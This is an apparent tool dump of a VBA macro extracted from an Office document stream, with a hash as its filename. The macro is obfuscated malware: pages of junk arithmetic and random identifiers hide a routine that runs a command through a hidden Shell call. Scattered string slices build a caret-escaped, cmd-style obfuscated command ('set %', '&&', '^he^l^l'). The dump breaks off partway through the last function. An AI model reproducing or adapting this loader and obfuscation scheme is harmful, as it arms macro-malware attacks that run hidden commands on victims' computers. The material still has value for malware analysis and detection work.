Filename     : ./macros/a77e40b03e814c6f554929a939839416d80f73228a123ab953be37a1f25780b5
OLE stream   : Macros/VBA/VRIHbZQQWNuHs
VBA filename : VRIHbZQQWNuHs.bas
----------------------------------------
Attribute VB_Name = "VRIHbZQQWNuHs"
Sub vMXRcQRtiXopI(lNrJNDptvKqLz As String)
On Error Resume Next
jAKvTzGzV = (TmHjhal - Rnd(43 * Tan(woAWqfhCZTGfvz)) / QCjYVzKrt * Oct(AEPrXEpL) * FJlMJfNQY / Oct(qqFTYrdACQzo - Chr(250) + 581 - ChrB(GMqaSKCORUcuEi)) - 389 + XsIjlFCUukrAt)
EmvVQMiAS = (vFVXZVd - Rnd(43 * Tan(TNndJHNCrE)) / wqaKJKfZGdrzq * Oct(oMdQhdw) * LXnFacnIN / Oct(aIWNUuMMtw - Chr(250) + 581 - ChrB(vcNzYVvjmJ)) - 389 + sffDXDkCmwQ)
WYhiasjDU = (BuQuZHCGrYbL - Rnd(43 * Tan(PqiQWJc)) / KXiGoQqvCAjpq * Oct(kPIwvivuapLYR) * sbMussrXlolrM / Oct(pXrWJYGT - Chr(250) + 581 - ChrB(YNuvQzpv)) - 389 + wwDbopwzz)
NdUMEWkEC = (oOslYTnjzzaZvt - Rnd(43 * Tan(tNINjCZMZs)) / nMJYKLusGBFNi * Oct(AIzzYnia) * LIbrSuPCTsjfb / Oct(YmPfCnUnAi - Chr(250) + 581 - ChrB(juZMAFG)) - 389 + UwQjUbzq)
wmUvbZkaN = (IfnXXHzl - Rnd(43 * Tan(ApqSncTGZIDu)) / EwVBfji * Oct(JzzqwaYz) * ImjszAIThSI / Oct(LRJPEbrBW - Chr(250) + 581 - ChrB(NGZqqrcqBuI)) - 389 + AQLLHvNiwQVrwh)
pbszhwEfY = (SHKRrqROKMQ - Rnd(43 * Tan(DtTwnodzlirIB)) / wBNMuUs * Oct(sAkwrHzHjmQw) * wjkIQCbrkP / Oct(PqsPAzR - Chr(250) + 581 - ChrB(AVATLrzWziBFrF)) - 389 + zVcDiSRrIli)
jAOkGjUUw = (wMYRTfd - Rnd(43 * Tan(iJKKNttYt)) / djdsidKwHNXSk * Oct(IaBJDmLmni) * bXWmVqiphr / Oct(YFivGWYQ - Chr(250) + 581 - ChrB(QYoBnrkUHbqwz)) - 389 + HFnKlWpdD)
fvBwiIjpO = (pJCjVziGNh - Rnd(43 * Tan(AQZlXqS)) / muzmVIFm * Oct(FMbmcZKKEVSLHP) * vwiibKHSNdb / Oct(pWhaPMiBBGT - Chr(250) + 581 - ChrB(rPbSUzBfiY)) - 389 + YiaKlzuNJAwUo)
Shell lNrJNDptvKqLz, 0
WvDwZOaod = (nMiowNc - Rnd(43 * Tan(wRiIwoCwDHtKYv)) / nvYwCGPzCvZnwD * Oct(wzhEzDJO) * OvcKSvSjsRvsZR / Oct(piTcNWBEtv - Chr(250) + 581 - ChrB(tdTzrdhZ)) - 389 + GdEiHdsvhIPW)
iHPPkhAcN = (jPHCoNuaRLzjS - Rnd(43 * Tan(doVjiFWl)) / oKVEhGwjzTP * Oct(pXEofAGrEXwpCl) * MRwIUwkTrSIMTU / Oct(BQDSoRQvwEQ - Chr(250) + 581 - ChrB(bQLjBwKkPzLuvF)) - 389 + NVWnnWa)
WimkziwVz = (EEJCfmG - Rnd(43 * Tan(JjOBEIWjN)) / ZcQdXAu * Oct(tQwfouAIprw) * hjQXdnL / Oct(diOORtwWmb - Chr(250) + 581 - ChrB(IICtpRduUBwS)) - 389 + nLVqLtzkpZz)
PCkNvzdWO = (ntipaFzs - Rnd(43 * Tan(ThLjbGYFLsczS)) / DdnhQzWXaEVz * Oct(qAlozrzGR) * TJHWsSd / Oct(MUKbMnXjsVvG - Chr(250) + 581 - ChrB(NbnhFZEc)) - 389 + VblZTYI)
ciFzRIiHP = (wQQzcLKwFhTpn - Rnd(43 * Tan(ZJHzjpmTzaPrq)) / pFzfSQan * Oct(FtQacOro) * qMXHAiYZBfQpj / Oct(VBHAjoWWSlzC - Chr(250) + 581 - ChrB(TOJFIlbA)) - 389 + lhFTGsPvWWV)
HuZVOHARU = (mJwXFLrZIEHkrP - Rnd(43 * Tan(vQhdHWObjw)) / oorBkKfjzX * Oct(vBhXVOSO) * CKvTrToNXY / Oct(SZhXCiHTzFHP - Chr(250) + 581 - ChrB(oVjvkAz)) - 389 + SbVdtYKR)
WSMbpoWUK = (mHwQRvvtiV - Rnd(43 * Tan(sdWYYAzLtJKzC)) / mvoNzzMlPNs * Oct(BJaiztoi) * ppCQoYIQKcJ / Oct(pfzGjfWbGNJfNw - Chr(250) + 581 - ChrB(kKJRJXzwFlwLa)) - 389 + UFljOLi)
acTORDWcj = (CplXFAKAYs - Rnd(43 * Tan(uUjUwXmIXwzn)) / KipDrUaU * Oct(OuVofOEaiq) * vjHktUfkUJ / Oct(DCcNWKHIDRO - Chr(250) + 581 - ChrB(GowHsXDwNJ)) - 389 + NdbFJXpqAQ)
End Sub
Function tNVafNPV()
On Error Resume Next
vZOfVjvV = (jrBNwwbQkwT - Rnd(43 * Tan(iwaCEck)) / ZLccnFji * Oct(JETziPhvAli) * MqFuTEXwJzm / Oct(qBXPZZqPsnbrAC - Chr(250) + 581 - ChrB(jtGDqFh)) - 389 + VWhUBMkT)
rTslMSqw = (VRuqAivtlLwdVS - Rnd(43 * Tan(fAitzCiUvr)) / XikiYSlOaTYL * Oct(ZwHdWWtUpF) * FzQXvnzzzSKN / Oct(CmirGsGG - Chr(250) + 581 - ChrB(MTDvEwZzNidBd)) - 389 + COTmWYLDPjz)
zmjjcaUis = (BOhSWpIiNFfKX) + Mid("u00itjqzEtOrijnzfMavQN6szkzF%=tCC38", 24, 10)
nrAELztCp = (SUHcrRWa - Rnd(43 * Tan(PhYOOuQzoEDvvt)) / oBtrFpDI * Oct(RZfvcrcjcw) * zoGHnECXfQNWa / Oct(nqXfVFMZEzpPUX - Chr(250) + 581 - ChrB(cTSzDJAvlDAmfd)) - 389 + DCEzoBE)
jocaY = (auWZQjEj - Rnd(43 * Tan(AhhNVIlfYlAOoa)) / JiWzknfiAzBbZK * Oct(tIAsEErWGwzpP) * CwlUZPlMFwJ / Oct(CjQUhLUjsr - Chr(250) + 581 - ChrB(wWsRIQClw)) - 389 + zwzPHzvGj)
AQjcT = (kiaDzvXXom - Rnd(43 * Tan(lbUSjvBtmKWjvX)) / LIZjRlTfQ * Oct(EaFIfhJB) * ScmYzih / Oct(fONvifijO - Chr(250) + 581 - ChrB(EVISvEKbVwkHcN)) - 389 + pElZkbFkVnRD)
qmIviCUrLrB = (HqiajJS) + Mid("rGccR5Q3NkTJZiVL80aDkNN%=XfMzoDcIMv8bE3uXd", 22, 13)
JcsMDmlh = (EijCKFm - Rnd(43 * Tan(nUimLlozh)) / cwCKLEDiREaLZa * Oct(oIOmpHCi) * zdhMmNbJRzdk / Oct(tWiwboh - Chr(250) + 581 - ChrB(buIbWcZLrqZRP)) - 389 + iXrvDdQtc)
prYsPfdGmO = (SaUuvAqsu - Rnd(43 * Tan(iKTXmEYj)) / VWiSVSi * Oct(oLIkOXPcdOpZzG) * cosptLGMU / Oct(wpsjHzb - Chr(250) + 581 - ChrB(DBhlWUmDv)) - 389 + qiHEPHFi)
dXBtCawcQCJ = (kBwaGDSlj - Rnd(43 * Tan(HHjlEYhSLzjOh)) / BLLVSrz * Oct(GfSbSTVsJChEBj) * drYoQNlhWUvYus / Oct(SpoIBASdGNwTqj - Chr(250) + 581 - ChrB(cBSMiduDjkU)) - 389 + wHXvbAMjsQshwL)
SuBYfDc = (bnOsIqfOwwViZl) + Mid("FMwhiowurfCdRAW     h0iWfHMjmCt65Ebk", 16, 5)
YkSUHIkHV = (dllizojSiWt - Rnd(43 * Tan(POItEhrRYC)) / QzVltrZldcWwf * Oct(ThzmCEhBn) * UwKKZOMEawU / Oct(dDqbIlPtsPdb - Chr(250) + 581 - ChrB(ztfWwHOJvRuj)) - 389 + LPPSYjwiE)
ZRBRp = (ihwjfVRSaViF - Rnd(43 * Tan(OYdmmMNaWHo)) / iKsZjVwWHEj * Oct(GKcpjYVlDsVYsj) * joJIaKEzLYt / Oct(AjiXKsijcjYtzm - Chr(250) + 581 - ChrB(bppUjAs)) - 389 + hwwGoBMRQ)
IvHMGuTV = (coFbhlvutZAd - Rnd(43 * Tan(rudBvzjuBMc)) / NMZwomuik * Oct(usHWIAjDWmQHNa) * YiVwnac / Oct(LUZVwEnGupu - Chr(250) + 581 - ChrB(kuYqjOzpqwGzzq)) - 389 + IYkzVSPwC)
wqvrtmz = (vbwvmuhEUjaZVh) + Mid("lBw6fwS94jYVqRn0iOuUvlk8", 21, 2)
dHFiOXJcVtz = (iVFUVLjOAAzQQ - Rnd(43 * Tan(nHcIVEMt)) / RAZNlpiP * Oct(HFSRwHTio) * AsPRilTjY / Oct(wMblNoT - Chr(250) + 581 - ChrB(zuYVkhIKsVLVor)) - 389 + ttPBjrbSJ)
wiBoaSmI = (wEUAXwfbApXhwU - Rnd(43 * Tan(PKNzulYLEA)) / ajJLShrE * Oct(UNdTXcHmQDjfao) * LzkjJZtPz / Oct(WzSpXqpsY - Chr(250) + 581 - ChrB(ChtcRdm)) - 389 + BUbzsqzTwIuXbz)
DmcBpqvI = (YhtuiIiIXtzUD - Rnd(43 * Tan(FwhswnjDV)) / PQYLNfLRDhQ * Oct(WzOHTbTi) * oCwQzzoFTD / Oct(LRfOjWvshf - Chr(250) + 581 - ChrB(VzvZhdrUI)) - 389 + mGaNcvOiWMji)
MCzZBqqnH = (LVvijDH) + Mid("76WjEnPqVEiaFT&set %YpGRw", 15, 7)
uHVMSjlDzsi = (DAdpwtNqmCi - Rnd(43 * Tan(iFIRjnwOf)) / WGbqDthwBdEEq * Oct(onqBndozJZU) * orOkdizOi / Oct(NFpTIoBFMa - Chr(250) + 581 - ChrB(jdswwaBAZ)) - 389 + CVpEqjRAWGczQa)
OREvSZi = (AmNEFOwRohizP - Rnd(43 * Tan(zlIJqGIhuO)) / DONNYaQMUYP * Oct(AMiUjoqwL) * zOKrHQljTrzYC / Oct(iDQHNnu - Chr(250) + 581 - ChrB(jVIzMlZsERUPOw)) - 389 + jSAblFY)
YBlapXk = (jHvNEbLkAPREk - Rnd(43 * Tan(pTmjMSM)) / GjAdsobpwcOd * Oct(OKOspOALED) * LzXaMYBDawAPNb / Oct(XIKSpqGlbJYr - Chr(250) + 581 - ChrB(DLYBdERsQA)) - 389 + XbKCXNvARGr)
kFQKTwDkDu = (MUVAvENuzIOV) + Mid("wnZblLYopset %ti178", 10, 6)
oYzJiLfNGzO = (bJilfYiiY - Rnd(43 * Tan(AfoiJDzJamiEm)) / jzjoNLJuLFhn * Oct(AtUVivWOTPzI) * bbilhWXsBjouVM / Oct(FTjBWVzQFRAI - Chr(250) + 581 - ChrB(WQklfQkiP)) - 389 + YKQpwNfbMj)
dbKRkdt = (soLTSzKjjmXCC - Rnd(43 * Tan(VqMMGcJUk)) / INXmTzwI * Oct(jnddbqkacLvs) * XjnmziVnjXEwK / Oct(cYPjpOU - Chr(250) + 581 - ChrB(arNlVVBhI)) - 389 + UUqozhARnuAPZ)
WDMWGcNRV = (lvCOEbAptL - Rnd(43 * Tan(FjBCZpnZcNPEp)) / pJYqFqwIUNScN * Oct(HnTGUEhu) * IzitofHVqNV / Oct(SczoUuzLo - Chr(250) + 581 - ChrB(zcfSouJkkMui)) - 389 + qazIdMrbP)
wjVEEv = (JAfwmabKZUhNH) + Mid("UrIfczqCuu6uBtLRTIEXOIrZO&&IrWEF0okohS4Wps4GoqTM2", 16, 12)
PLqYtf = (QmHCMcGdUEI - Rnd(43 * Tan(ZNJzmCOPiqOoZi)) / YbZSLSiUjNwU * Oct(iqzlfDImInIw) * JAaXTdd / Oct(iBumzdqsalnhi - Chr(250) + 581 - ChrB(nqdJVZwPnRTK)) - 389 + iuLuVqnA)
OhKdNjttP = (PYHWEzXTvqoTBW - Rnd(43 * Tan(mYCmpaEiazEFNH)) / aNhiaYz * Oct(VwCBoRYjAcqKX) * IaXKuhYzsKLsPa / Oct(TwamijqnZQMB - Chr(250) + 581 - ChrB(EcWzffFHK)) - 389 + iSRWDrpwC)
OazPfXaZuZq = (uKIEwSOcSnVH - Rnd(43 * Tan(OrSquhwldbvHCh)) / wCrfVKQkMmqh * Oct(cjuFKvULCbX) * NzQiNwtldjQvpl / Oct(zGFDEzXJzhqzH - Chr(250) + 581 - ChrB(ataUkHNz)) - 389 + zqwwzvP)
pMNZv = (FzhaStiCVRScM) + Mid("f6VJ6n4t %hMAoEclr%UrfVBozviV7V", 8, 12)
iXhZOBHBsC = (tjjQXpNRmzuifH - Rnd(43 * Tan(PoONkVfJhwUQKn)) / kTJDXYvGZpRnUM * Oct(wmKbnDaiSd) * XzTDZDirN / Oct(YcjWTipXShK - Chr(250) + 581 - ChrB(MzhGjzrKlrZIAw)) - 389 + VQOIcztYKaET)
PzWaMwtZPS = (vunaQbFIiGuRjS - Rnd(43 * Tan(sQowXCUzETGjaj)) / EIzAOaIjRVkS * Oct(DKKSCuLSn) * LtaviHJvfbBCl / Oct(fDTjjXdnk - Chr(250) + 581 - ChrB(wuIoijV)) - 389 + QUoHofZZI)
NkFvCOX = (fACpjCbWXv - Rnd(43 * Tan(GDYizSbXfi)) / WaZsiEZJSzz * Oct(dcwErHziwZQEwW) * cUswnpAdcP / Oct(YWwNdVJJvFBOk - Chr(250) + 581 - ChrB(jvizJVvHi)) - 389 + paAKEcwUoDjcmj)
ShqvijSL = (kLzvEamTWT) + Mid("jnmSmhOKzC9j0QVPicEBdj", 5, 6)
YbsREjfwo = (FqPAYsmwabi - Rnd(43 * Tan(KXJWzozVQ)) / FnlRiYOoJKPCit * Oct(vVQBfFufAKQzS) * lamJGkbPGNO / Oct(mRYBIpQiDSiT - Chr(250) + 581 - ChrB(tLIlHObwIYkc)) - 389 + bIMjOCnvScHzB)
YjKjPSfzHp = (jZjHDwqkfbkW - Rnd(43 * Tan(VtMtMUjDKUn)) / zvCJCdOXNs * Oct(COffCpitG) * EWDMPdsShZFs / Oct(EDoadwVwPcaJ - Chr(250) + 581 - ChrB(jpdOfahluYw)) - 389 + mzVFjTNJibcOOB)
iJlGdpKjbQZ = (zmndsoZPOIVXEj - Rnd(43 * Tan(objBmFnuMjG)) / JTPisCPCAIojT * Oct(mMYOEOKnkl) * SruMsbzmuQwwZ / Oct(UoifjmziMTb - Chr(250) + 581 - ChrB(wcsiWjitZK)) - 389 + qIhrzYJqNw)
idraYWFSJT = (jkbSrTZMZTd) + Mid("sMB0f3sV6fdRsMNHtiiPqNiXm0w0L8EfWiuNw", 17, 2)
odAlYiPnjJO = (knptdCkwDoTtiK - Rnd(43 * Tan(JipdqwzsjJMzBF)) / PzdizwFfV * Oct(CCSRMZjzfRzYlK) * kuFjQDjrqZTQAN / Oct(EwUiovh - Chr(250) + 581 - ChrB(WkdAVnPqOSh)) - 389 + DzvEsSLcr)
ncfErNQI = (nvIQJOJOJoAv - Rnd(43 * Tan(UiKijYz)) / wKPvDwjmAjGl * Oct(dPstNLtT) * CLwGKQLnES / Oct(ColtUFPac - Chr(250) + 581 - ChrB(ItKtrOSk)) - 389 + MEOcHDzzoS)
nEnWjNET = (mCNDajFzSAwFDP - Rnd(43 * Tan(VkEjdbuPqbQlL)) / jKkQvRpFHBInLQ * Oct(iHvoNAQwjFYs) * XcKztAlqMpHzA / Oct(dCapPiiIT - Chr(250) + 581 - ChrB(zwvQLBKXZC)) - 389 + frLuLfuVSoqM)
ZfjlhrKs = (JilfMwEDWACSj) + Mid("t4noYON&&seDJFitvjEAhznBnE6qWw", 3, 9)
ZLYmqnOTiO = (NcoWJoizZIw - Rnd(43 * Tan(rNuSnMSBt)) / iFKnMdp * Oct(HaHAvjEokC) * SLOQlXOMlJkV / Oct(iKtiMVbBK - Chr(250) + 581 - ChrB(AVLqSON)) - 389 + cQSarUpYQwQDNW)
sjXDYEY = (scowzOUhc - Rnd(43 * Tan(jtiwoXfZlW)) / btzFTGoa * Oct(ZazjzsmViWt) * AtiWjjQTFraz / Oct(QjoqdIjH - Chr(250) + 581 - ChrB(vGvwAvlJvOcYbz)) - 389 + ikWXGXiAw)
HqYnoYmj = (iIJNuajvwYK - Rnd(43 * Tan(FwHSZtnF)) / kGndRVYhcqW * Oct(ojShGuzkC) * iDOwrKSMc / Oct(JwwBWkcFHOVho - Chr(250) + 581 - ChrB(QPplTwqUaSbkOS)) - 389 + OPQNhFqlQLV)
CqhQwqsX = (qSlmWcO) + Mid("DM4JP4vZcZnR^s&&ss4aVarw18f33w", 13, 5)
lusEs = (hJzfBONdBw - Rnd(43 * Tan(bljVhvwLXjp)) / XHslIAaNGzaS * Oct(nitAOuZBoHzn) * Zcmpaos / Oct(aXIcFdbkWd - Chr(250) + 581 - ChrB(QiuQCKIp)) - 389 + hiAtzFbwb)
mBZrEHY = (IwJCzptlwlZtl - Rnd(43 * Tan(puukLnvK)) / quUcqzndXwcS * Oct(RZBULcFD) * ZQbAFQojFuzQT / Oct(fMCmLICu - Chr(250) + 581 - ChrB(scdUiqcT)) - 389 + dwUDBpu)
CQvfuYwFqz = (zQSdoXUiL - Rnd(43 * Tan(iSzbrrWPfzBc)) / FHZpVjJR * Oct(zXSRPWEalwnr) * EmzVVkWsJPVH / Oct(WPhzwBSsS - Chr(250) + 581 - ChrB(JabAKEOEoRT)) - 389 + mqzKYvt)
BAkTsEtXaY = (WlaNNHlXJ) + Mid("klO9zIwZvLhft4EBE", 6, 2)
WCWwvFR = (onsiVwwRWI - Rnd(43 * Tan(quuqfHiY)) / wFsdbsmUnbK * Oct(rpUOBaXj) * CMiTcKiIpwT / Oct(SZivPHcJd - Chr(250) + 581 - ChrB(uzwwFabdhLr)) - 389 + tsKJwiEMwiruYP)
TzFzzDVJk = (IROrOcYjVNW - Rnd(43 * Tan(JBwCHoiIZwKw)) / DRfqSCZDibd * Oct(fSuhMFzfisIh) * mbjFEMGPQL / Oct(tqDKzifa - Chr(250) + 581 - ChrB(QcWoaMqMTt)) - 389 + IzTjaswZ)
pFMwTLiQu = (jLPIaVjp - Rnd(43 * Tan(FIuEQjPGBZqp)) / rNQUuVaY * Oct(UcwjmPjUDjvh) * LASlrCiVEPS / Oct(UBrFaKOMTo - Chr(250) + 581 - ChrB(IkuzWjWGt)) - 389 + KCQCJiYuQPN)
qkjpbfGtJMr = (SmTuXBXRlXiF) + Mid("ZtFGi8m1iMXRcQRBZqW csZdEtj", 10, 6)
owKPBK = (WWPHjoVCn - Rnd(43 * Tan(DNiOGJFsfsWu)) / WACvXXjFfFLzuN * Oct(FlqoZkpza) * NWVAThsbZsHh / Oct(wfDdXHXRLwqnt - Chr(250) + 581 - ChrB(hVLhCbL)) - 389 + AOEMYSVU)
CISzvf = (UIFZVzcmt - Rnd(43 * Tan(WWHwOMmWY)) / aDhQCpajTCi * Oct(qopmlHSha) * mLTZZnDSJT / Oct(TrRbpWjWwSr - Chr(250) + 581 - ChrB(FfSHbaiDqAH)) - 389 + WzdPncAsP)
LACGri = (BZfNZfKGO - Rnd(43 * Tan(EFhoipYL)) / EvqbhOAJZzEP * Oct(YsIajrmt) * OGJDSLEi / Oct(jGGzXKwzwYWl - Chr(250) + 581 - ChrB(KvrjofDF)) - 389 + YqwhkRivpFu)
hJtDwOaFrfP = (IYssIVHRpD) + Mid("SinW4    13IlirDhqimPCBVscDLCpOV", 6, 4)
YacRfKDdAj = (WzYLwlmLiAvj - Rnd(43 * Tan(tHjcrfPpT)) / AEstQjTSwPUI * Oct(jPitRfVGUq) * jIHzJNAvCMXG / Oct(sWbKizR - Chr(250) + 581 - ChrB(klzMNmwJwijOI)) - 389 + HbTIlOZF)
jvrIInl = (rrswFVOHkznNwt - Rnd(43 * Tan(VJkJhrq)) / JzzVaiwTkkkjm * Oct(OHjaYsEcZLZVj) * YnlCAAiz / Oct(zodniCcO - Chr(250) + 581 - ChrB(PfvddGTz)) - 389 + jXmvEwmvwzij)
wDLQJ = (ZqwWKnvaBl - Rnd(43 * Tan(iqswiOz)) / aLCTidlDnlDFn * Oct(IpRKkRj) * KNnBaVQdR / Oct(DTzLWXTtZkH - Chr(250) + 581 - ChrB(wjQchDiXdiKMB)) - 389 + fdCQmKTXBTIzS)
AjiSl = (LJZAuDKX) + Mid("MjXWZqj2iuwqwIrwK%!      uRo", 12, 14)
CSmqktrB = (HOzhmvFaZwzM - Rnd(43 * Tan(BPuKijDO)) / bWDjfBj * Oct(cfjdXji) * UXsLGbojwwWAmV / Oct(dXEncdDQDrTURf - Chr(250) + 581 - ChrB(djQOJLKDvAh)) - 389 + liiiTHjDGS)
oHjtMDVcQ = (FizicrkNHLNnZE - Rnd(43 * Tan(MduMDjNnkjpkB)) / qaoZzZXYnXjF * Oct(wiNhDEz) * jPHLMsvPzmHif / Oct(kZNciTopX - Chr(250) + 581 - ChrB(zfOEXBmjCtJ)) - 389 + jNkhbInk)
KEzNspSsBr = (XLnSTInvJSiY - Rnd(43 * Tan(zMlcWKqO)) / sEWjJtKQQOrzwv * Oct(lmJFFIwZQLmtl) * wIwWbTjwkzu / Oct(tCThLDRtqkAl - Chr(250) + 581 - ChrB(otfFXWzY)) - 389 + SGubUcIpBKKUO)
mljjYHHF = (BSRHoUmGXDUTn) + Mid("X4md5rJWWpL%=HjMPCdOSs0FHpwvrM", 6, 13)
lzwEWKQ = (XZhwnTbajA - Rnd(43 * Tan(scNhdrrzAbjlH)) / tArzrfBnFaG * Oct(GjiLGWtSSDzC) * jRqjwqn / Oct(YtTjcoUpEWn - Chr(250) + 581 - ChrB(wlIPpUKsoHp)) - 389 + ptHOLDH)
EapmjwaDi = (uqQAwiTHWjIfAI - Rnd(43 * Tan(WAocbOrE)) / kfHkiNu * Oct(rWrpnfB) * jDJKWPRGFndDVS / Oct(ClQQRWjZJlGo - Chr(250) + 581 - ChrB(QUiUmjvLiud)) - 389 + NBfujrfYpp)
TrIdnVDRn = (bHwIaudj - Rnd(43 * Tan(lQDTujjFdAPDJo)) / SANrcTL * Oct(InNlJFkJdDWWR) * vhtBTANSISTu / Oct(ajmEcaXvfjzWz - Chr(250) + 581 - ChrB(qlAmSmjEjzbAL)) - 389 + qivSPPKdrwu)
HTznjrK = (SHipPbdhYdOh) + Mid("XX13TXfidWfq7Cw7jaiB4Eet %BNKvzdlVr", 23, 8)
jYivYDMSfB = (XPkawiz - Rnd(43 * Tan(QbnpkEIQpX)) / UrmvEVEiZu * Oct(PpbQLFCFwji) * NtZMuqaaqB / Oct(UMlTjEszZ - Chr(250) + 581 - ChrB(pMwNTtDOjYp)) - 389 + UYCiJJozTkNW)
jNhmai = (dumtujnFSY - Rnd(43 * Tan(WnGYWRvzX)) / UXBkisTNJG * Oct(HutQjNVjIr) * bFcPUpOQI / Oct(aCJWkIPn - Chr(250) + 581 - ChrB(sJSrOtMInE)) - 389 + SOiBvvIPYdz)
YWWvQHV = (YjawawXMGddjs - Rnd(43 * Tan(RBviLaKEw)) / GQTRsiRIccz * Oct(EKirbHiksY) * MTTFXVji / Oct(hwrKdFTXLV - Chr(250) + 581 - ChrB(PNwzlATw)) - 389 + aOkiEGw)
NANsjZrjio = (DZlVAGhJ) + Mid("B54GLIs53=^he^l^l&CPtD913iSLF", 10, 9)
KYjYMU = (zQjrktwEFtozI - Rnd(43 * Tan(ONWHhaMi)) / MYHboAAOrsQUb * Oct(BcOozUZaitlh) * tRvYfPcUTcSJDF / Oct(wHspnfUiTlN - Chr(250) + 581 - ChrB(OmtOpHFHz)) - 389 + TkFwNiAvfvPvdX)
HtwwIC = (PAQApGG - Rnd(43 * Tan(ioqBsudEhCLJ)) / wEiWqtQfE * Oct(NTTSGYfOfWHX) * cfLlIQwEhmmRv / Oct(iwMpFdGciZcX - Chr(250) + 581 - ChrB(CnjnIaRFqiI)) - 389 + PGifjjBK)
zDhXEFFj = (BOiZOdBww - Rnd(43 * Tan(BnHjoRliYGRw)) / IWNsMqiKT * Oct(SDkfJlSdzQOc) * tNGzmIDjBDvZ / Oct(AkpHPVh - Chr(250) + 581 - ChrB(pfDlcsFc)) - 389 + hEjmUfGtw)
IZowfwN = (wuPYmcm) + Mid("in=p&&set ba2zZiP4zKokXqXfh4", 3, 8)
hrVMzVj = (APShBthzzmJll - Rnd(43 * Tan(QBziqidoUEhqXc)) / BsbMpCYNGHhjFs * Oct(zWiKNihCKfMMv) * zKVECwuhZ / Oct(tsosWIuYwcFLMM - Chr(250) + 581 - ChrB(TTpQjcqcz)) - 389 + wLiCvzRw)
pIOpW = (nrMTzzHikzB - Rnd(43 * Tan(iIuQiDjPFhJd)) / rsXLTmdZwH * Oct(pNnqCjvobqZB) * EcQpdWGijvF / Oct(jXRNYKf - Chr(250) + 581 - ChrB(KaUPpMZ)) - 389 + UChSqrHqVnwc)
jtuvwjMf = (JqjdERsTDPplZz - Rnd(43 * Tan(VAioOdvtd)) / JOvnaJqSzCo * Oct(SsAEOOFAD) * EVTPoUZ / Oct(OzGwvCzfdG - Chr(250) + 581 - ChrB(TbvbChloKOjnca)) - 389 + KZUKUVt)
XtwzY = (RVppjBloQTIo) + Mid("wwIuQwfpihzKuh7fun1hfWtSR0qLEF8pQhkSCWI&&!%hO9", 36, 9)
EAqSrKPdkd = (BGSilSI - Rnd(43 * Tan(bCjtAVdHBzR)) / VNjOmPsQbskODz * Oct(TChEtRHt) * AZpWdjToiijoaD / Oct(WasCiRSqAMJFUv - Chr(250) + 581 - ChrB(fNThNNZWmr)) - 389 + wjYTVtwliT)
ZCSHaKkGHcM = (rpGzBZWivPu - Rnd(43 * Tan(XcdnZlFLGuDGjo)) / zWHbuiMnBIBd * Oct(TETssjq) * PcRXRPZzlAQMoX / Oct(oozQKpbi - Chr(250) + 581 - ChrB(IDsCaKNzwl)) - 389 + tqDcPnqPIkQN)
kimKO = (GzSUsqhwEFLKV - Rnd(43 * Tan(SjqQGiMEGIIz)) / ikMTNZDcZBA * Oct(IElOUtA) * AQITDXQj / Oct(sJLtLCM - Chr(250) + 581 - ChrB(mzkRFsfqPwibp)) - 389 + PIniObsPqJXb)
YXPtBMm = (EKhiipKTiw) + Mid("1IzwRiLqWMwoset %oiLUnU9RQm288zcrfjWrr2M", 13, 8)
jcKHflH = (sfEtSfJnwtPOWW - Rnd(43 * Tan(bnSOCnSwkW)) / XwMWnrp * Oct(KuFTiScvvwnNtQ) * nVSCLIZhT / Oct(RIKbcGXZZM - Chr(250) + 581 - ChrB(VTnvZrXBwII)) - 389 + jZAUpdo)
pdZiXzu = (NPfkMZoiJzXP - Rnd(43 * Tan(ipXlrPsj)) / IolPrSQbXXIImo * Oct(HVuwpSVhwvQ) * hnZIbGTGrzzi / Oct(ShbAHBwBrd - Chr(250) + 581 - ChrB(UtrbmHoTah)) - 389 + owOjCShoHYMd)
XuwKSzDRipY = (pSBiGlQ - Rnd(43 * Tan(fWOJBiC)) / livkbPjWakI * Oct(EKjUoBqGzq) * sYihPiDJnSrF / Oct(sjdZifDVdszU - Chr(250) + 581 - ChrB(uVznvcvzDLsiT)) - 389 + XbVEMFzbFYQXT)
kAvwURUfKr = (NmzNKRUSqQoT) + Mid("LR56jnuBfNbRQKzV&&set oBQ7fP3Rc", 10, 13)
KzvtwthNY = (lthpuUkqJD - Rnd(43 * Tan(iOsUkLdHojsdl)) / wdUCVzIQUqs * Oct(wYFwsfuawn) * MEwuEonsQvP / Oct(rQnnGiSuCcKMEC - Chr(250) + 581 - ChrB(rNiKcKDHwZCEb)) - 389 + zbijcOjErovj)
HqoslnG = (AidbZbzvjRi - Rnd(43 * Tan(lhvzwnrhOBZ)) / NbQwCwkOvaliKN * Oct(XpAstczU) * VojTCQQzIiOwL / Oct(snjQfKv - Chr(250) + 581 - ChrB(micTsNJfW)) - 389 + GbaOPQLfJ)
kZjuhNnLTo = (IpNDaqOEAjdco - Rnd(43 * Tan(nVtPvRfX)) / qMCfkTu * Oct(wqaXOilVpiTjOG) * NkIInVrUI / Oct(lXqXKdkFmjmN - Chr(250) + 581 - ChrB(YrItFmMopkzpv)) - 389 + KHYFVRlcGuw)
THUnWqp = (XkujpBwvihkml) + Mid("IlLL8wKTh         w4flfPo", 10, 9)
mkJrtzt = (VfzMMmIENLRJ - Rnd(43 * Tan(ECwrjYCpcIwrj)) / iYPFABIwGiP * Oct(FFFSKzzj) * LRZcGGztXB / Oct(dJdjzGQIjH - Chr(250) + 581 - ChrB(PbcSzjKzzuAHSH)) - 389 + ctuLDjhvdwbZU)
jDvwJc = (zXlGjwavAzZAPE - Rnd(43 * Tan(rjsQQhs)) / aMjlXid * Oct(IdJMcpwddrJ) * aIwXXbuOCKK / Oct(HUKuANCR - Chr(250) + 581 - ChrB(UQWFsYCkPn)) - 389 + YPcRPINwjP)
QFwknRwhw = (oJNiaCadCLZHdW - Rnd(43 * Tan(YEMijzVVK)) / sQFAsBFtdFlzU * Oct(fUzuQANa) * caJESQAS / Oct(DthlVcJJTOAQb - Chr(250) + 581 - ChrB(kDDLzaEKcRE)) - 389 + aizmccmzuba)
ijVBdnmmERm = (ipzOQBz) + Mid("nBcDjJYXopI%!!%tIZp3r8i4qtkJIZJnoBB", 8, 12)
iKOmlShABdn = (wTzEHiEcQps - Rnd(43 * Tan(GsZRfDs)) / mXlnrstirzG * Oct(HqSDInQXjnXj) * JVZpritqlrb / Oct(JMOlZkQjKwPZ - Chr(250) + 581 - ChrB(JsmVwzABHh)) - 389 + ToARMrVwrV)
LIIFmY = (MjLjmjVFAjN - Rnd(43 * Tan(liBJHCw)) / fPuHjUwzPU * Oct(iOQwhwijqt) * iCJfCzArp / Oct(lLAwoEA - Chr(250) + 581 - ChrB(kYqjOipUj)) - 389 + KZSGdRlszB)
